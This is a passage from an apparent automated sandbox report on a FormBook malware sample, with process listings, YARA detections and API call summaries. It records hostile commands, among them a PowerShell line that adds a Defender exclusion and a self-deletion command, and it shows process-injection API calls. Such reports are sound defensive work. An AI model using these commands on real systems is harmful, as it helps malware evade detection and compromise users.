                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:06:28:28
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0x90000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:06:28:28
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0xfc0000
                                                                                                            File size:743'936 bytes
                                                                                                            MD5 hash:88153AC6837F5034A7AB44259C90F4DD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000004.00000002.1623721118.00000000011EF000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:06:28:28
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:06:28:29
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                            Imagebase:0x7ff62d7d0000
                                                                                                            File size:5'141'208 bytes
                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.2823254798.000000000DEC4000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:7
                                                                                                            Start time:06:28:30
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff605670000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:06:28:33
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                                                                                            Imagebase:0x770000
                                                                                                            File size:1'264'640 bytes
                                                                                                            MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:9
                                                                                                            Start time:06:28:36
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:/c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0xa40000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:06:28:36
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:5%
                                                                                                              Total number of Nodes:202
                                                                                                              Total number of Limit Nodes:14
2f34888 37625->37633 37630 2f348af 37629->37630 37631 2f3498c 37630->37631 37637 2f344b4 37630->37637 37634 2f348af 37633->37634 37635 2f344b4 CreateActCtxA 37634->37635 37636 2f3498c 37634->37636 37635->37636 37638 2f35918 CreateActCtxA 37637->37638 37640 2f359db 37638->37640 37831 122d01c 37832 122d034 37831->37832 37833 122d08e 37832->37833 37836 5652808 37832->37836 37841 5652818 37832->37841 37837 5652845 37836->37837 37838 5652877 37837->37838 37846 5652990 37837->37846 37850 56529a0 37837->37850 37842 5652845 37841->37842 37843 5652877 37842->37843 37844 56529a0 2 API calls 37842->37844 37845 5652990 2 API calls 37842->37845 37844->37843 37845->37843 37848 56529b4 37846->37848 37847 5652a40 37847->37838 37854 5652a58 37848->37854 37852 56529b4 37850->37852 37851 5652a40 37851->37838 37853 5652a58 2 API calls 37852->37853 37853->37851 37855 5652a69 37854->37855 37857 5654013 37854->37857 37855->37847 37861 5654040 37857->37861 37865 5654030 37857->37865 37858 565402a 37858->37855 37862 5654082 37861->37862 37864 5654089 37861->37864 37863 56540da CallWindowProcW 37862->37863 37862->37864 37863->37864 37864->37858 37866 5654082 37865->37866 37867 5654089 37865->37867 37866->37867 37868 56540da CallWindowProcW 37866->37868 37867->37858 37868->37867
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90896ebed81f9a0d05b2e032669c912bc753bd75ebf5dc29ba62d49683a16214
                                                                                                              • Instruction ID: 37635350472c6c386ab9f2883955af1875a0cba500fcab36fef1f2a2c242a90e
                                                                                                              • Opcode Fuzzy Hash: 90896ebed81f9a0d05b2e032669c912bc753bd75ebf5dc29ba62d49683a16214
                                                                                                              • Instruction Fuzzy Hash: A7A2C134A512598FCB55DF68C894AD9B7B2FF89310F5085E9E80DAB360DB31AE85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84901cbe0e28994e2a1b9a35016060ea8356cbf0f3cced24aabb971e41af9ce4
                                                                                                              • Instruction ID: 62bc29a55b9319f09159c79bc594706db302fafa2ed6e4d27f2181d43c7e5367
                                                                                                              • Opcode Fuzzy Hash: 84901cbe0e28994e2a1b9a35016060ea8356cbf0f3cced24aabb971e41af9ce4
                                                                                                              • Instruction Fuzzy Hash: ACA2B034A512598FCB55DF64C894AD9B7B2FF89310F5085E9E80DAB360DB31AE85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2bd306a22826c14b969bfec7ea9101f50b3744cfc11836df6b922a8fddc8c477
                                                                                                              • Instruction ID: fbb9fed316ee0c41b98e3258bd3492016944cda727f4bb5896be9dfe5663dcd8
                                                                                                              • Opcode Fuzzy Hash: 2bd306a22826c14b969bfec7ea9101f50b3744cfc11836df6b922a8fddc8c477
                                                                                                              • Instruction Fuzzy Hash: 40228C30B012048FDB19DF69C960BAEB7F6AFC8748F248469E5469B395CB76DD01CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d8ebbacb8ff26cbbeeba1b880848482f2a75c0b7557072fe302c85ea0c7e696
                                                                                                              • Instruction ID: 98a2fa82e5ff7e5d44f987940485ec63b138c1d80f74383a94bb3cfbf41656d0
                                                                                                              • Opcode Fuzzy Hash: 0d8ebbacb8ff26cbbeeba1b880848482f2a75c0b7557072fe302c85ea0c7e696
                                                                                                              • Instruction Fuzzy Hash: 03710775E04219CBDB28CF66CC507E9BBB6BF89304F14D1AAD409A6291EBB15A85CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c161cd7e3fa07dcc82e56b2d8a1ce7ac4e45e0f3b4e5f6faee40a3567185bbc
                                                                                                              • Instruction ID: 16f29c88f5c20ea405ef087827f8c4688bb9ea2fda13da750fee5984b7e99b41
                                                                                                              • Opcode Fuzzy Hash: 7c161cd7e3fa07dcc82e56b2d8a1ce7ac4e45e0f3b4e5f6faee40a3567185bbc
                                                                                                              • Instruction Fuzzy Hash: B2214FB1D052488FEB19CFA6C95439EBFF6AFCA304F08C0AAD448A6255DBB50549CF90

                                                                                                              Control-flow Graph: entry block 9105d94 (graph rendering and executed/not-executed legend omitted)
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09105FD6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: e2259600fbecad4a3f7e37efb7b3070564fe4bae46d5f9290fb920204637e0f1
                                                                                                              • Instruction ID: aa88b075e54b7bd4767b46f4a1a502c1d845cde968298d8faff62ce39f361b08
                                                                                                              • Opcode Fuzzy Hash: e2259600fbecad4a3f7e37efb7b3070564fe4bae46d5f9290fb920204637e0f1
                                                                                                              • Instruction Fuzzy Hash: ADA19E70E00319CFEB10CF69C8517EEBBB2BF88304F048569E849A7284DB769995CF91

                                                                                                              Control-flow Graph: entry block 9105da0 (graph rendering and executed/not-executed legend omitted)
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09105FD6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 7e584e58e4926e9e7cb5cc44359b7b7c30880b15a8d497390f6de5c0f7aafb64
                                                                                                              • Instruction ID: 686cbe2899c13a4986b437e229c75a2927fbb630381d1c9cbf078bdb8cf6c27c
                                                                                                              • Opcode Fuzzy Hash: 7e584e58e4926e9e7cb5cc44359b7b7c30880b15a8d497390f6de5c0f7aafb64
                                                                                                              • Instruction Fuzzy Hash: 2E918B71E00319CFEB10CF69C8517DEBBB2BF88314F048569E849A7284DBB69995CF91

                                                                                                              Control-flow Graph: entry block 2f3ae28 (graph rendering and executed/not-executed legend omitted)
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F3B07E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: bcfaba0c8efd72d0f32fba724e85d8b24fc4b5d67523354f09067431fbba4aa6
                                                                                                              • Instruction ID: 3d174e13492e6d1aed18fd93e79f26893407d8c3bed17aa216d5a6597c7415fb
                                                                                                              • Opcode Fuzzy Hash: bcfaba0c8efd72d0f32fba724e85d8b24fc4b5d67523354f09067431fbba4aa6
                                                                                                              • Instruction Fuzzy Hash: 947144B0A00B058FD725DF2AD45479ABBF2FF88344F00892DE58AD7A50DB74E849CB90

                                                                                                              Control-flow Graph: entry block 2f3590c (graph rendering and executed/not-executed legend omitted)
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02F359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 742fe038e0ed7bec3004d5997de142947ace308a55599b88abfc3981fe41f883
                                                                                                              • Instruction ID: c05933144afe4bb08f19fff7a32be3d851cc4b77f80712f499b7cae1fe7ee89e
                                                                                                              • Opcode Fuzzy Hash: 742fe038e0ed7bec3004d5997de142947ace308a55599b88abfc3981fe41f883
                                                                                                              • Instruction Fuzzy Hash: B041E0B1C01719CFEB25CFA9C884BDEBBB5BF88304F64806AD408AB251DB756945CF50

                                                                                                              Control-flow Graph: entry block 2f344b4 (graph rendering and executed/not-executed legend omitted)
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02F359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 73b58935bfa4703056d1b9293d1a9c4f1fb297a335f445f8206e3d13e1e70bc1
                                                                                                              • Instruction ID: 9c545a566222179ee6779e4867ef2fa86bde7be913ca7081b37023f264e79be8
                                                                                                              • Opcode Fuzzy Hash: 73b58935bfa4703056d1b9293d1a9c4f1fb297a335f445f8206e3d13e1e70bc1
                                                                                                              • Instruction Fuzzy Hash: 5A41F2B0C00719CFEB25CFA9C884B8EBBF5BF89304F64806AD408AB251DB756945CF90

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 10 basic blocks spanning 5654040-565415c; block 56540da-5654112 calls CallWindowProcW.
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05654101
Memory Dump Source
• Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 3a9b20a1575dd93da3c5d433a2af760b74b39cb2dab8d105d790573c5738b0c0
• Instruction ID: fc84daeb821c8ed1e7a851958183501052522e54803475c75991136bf8d8eee4
• Opcode Fuzzy Hash: 3a9b20a1575dd93da3c5d433a2af760b74b39cb2dab8d105d790573c5738b0c0
• Instruction Fuzzy Hash: 36411AB4900705DFDB14CF99C848AAAFBF5FF88324F248499D919AB321D775A841CFA1

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 5 basic blocks spanning 9105b10-9105bee; block 9105b76-9105bb5 calls WriteProcessMemory.
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09105BA8
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 6adec29cbdc4b47cbd586539c848c8dbafa2035d5afd00eac2e6fd571c1cf5d8
• Instruction ID: 7c7611f4b6fb526318d0158b58c2973262fc2b6b9d9764e72b78608b9933359e
• Opcode Fuzzy Hash: 6adec29cbdc4b47cbd586539c848c8dbafa2035d5afd00eac2e6fd571c1cf5d8
• Instruction Fuzzy Hash: 762137719003499FDB10CFAAD885BDEBBF5FF88310F14842AE958A7251C779A941CBA1

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 5 basic blocks spanning 9105b18-9105bee; block 9105b76-9105bb5 calls WriteProcessMemory. This summary overlaps the 9105b10-9105bee one above: it enters the same code 8 bytes later and reaches the same call site (ref 09105BA8), so it is the same function seen from a second entry point rather than a second copy of it.
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09105BA8
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: edc5ba58ec2ee339079ea08b17b7cad391dc4f6e2e377677a28155b18145beec
• Instruction ID: 20795da1bf95473862ae7a2c2e5186b910df7e431ba127ac3dc232e04e5addbd
• Opcode Fuzzy Hash: edc5ba58ec2ee339079ea08b17b7cad391dc4f6e2e377677a28155b18145beec
• Instruction Fuzzy Hash: 162126719003499FDB10CFAAC885BDEBBF5FF88310F14842AE919A7250D779A940CBA1

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 7 basic blocks spanning 9105978-9105a44; block 91059db-9105a0b calls Wow64SetThreadContext.
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091059FE
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 8a379a1669d79b0590a46cf0f3c8a9c7c3a74678ad3fb23f7db728112f2cf24f
• Instruction ID: efdfe19ab17e5cca5e84fd082eb813852dc923a9f5aa36f8f44e508c8b93b2ed
• Opcode Fuzzy Hash: 8a379a1669d79b0590a46cf0f3c8a9c7c3a74678ad3fb23f7db728112f2cf24f
• Instruction Fuzzy Hash: EC215C71D003098FDB10CFAAC4857EEBBF5AF88324F54842AE459A7241C7799945CFA1

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 3 basic blocks spanning 9105c01-9105cce; the entry block 9105c01-9105c95 calls ReadProcessMemory.
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09105C88
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 24f6cca7a13ed62913a5b85b14263b6b84f041e40ef641566ce9230a48ed06db
• Instruction ID: 0b86820488140f968e95255d5b255ed6e93f3d10e47126ca9c482870f31e64e1
• Opcode Fuzzy Hash: 24f6cca7a13ed62913a5b85b14263b6b84f041e40ef641566ce9230a48ed06db
• Instruction Fuzzy Hash: 8D2139719003499FDB10CFAAD940BEEBBF5FF88310F14842AE518A7251C7799541CBA1

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 3 basic blocks spanning 2f3d2fc-2f3d7ca; the entry block 2f3d2fc-2f3d7a4 calls DuplicateHandle.
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F3D6D6,?,?,?,?,?), ref: 02F3D797
Memory Dump Source
• Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: a014205f5a770ce2ccdf46ee79bc18121bb9b2a27259ee39787dc245c95bf6fa
• Instruction ID: a23def1f41254dc187010a94a91c034c112a2a6d3b300bdfc0714052230af862
• Opcode Fuzzy Hash: a014205f5a770ce2ccdf46ee79bc18121bb9b2a27259ee39787dc245c95bf6fa
• Instruction Fuzzy Hash: F721E4B590024CEFDB11CFAAD884ADEBBF8FB48310F14845AE914A7311D378A950CFA5

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 5 basic blocks spanning 9105980-9105a44; block 91059db-9105a0b calls Wow64SetThreadContext. This summary overlaps the 9105978-9105a44 one above: it enters the same code 8 bytes later and reaches the same call site (ref 091059FE), so it is a second entry point into the same function.
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091059FE
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 344ac012c72ad8e39294159afe486259fc7eee520491e8113de476e1fce3f23e
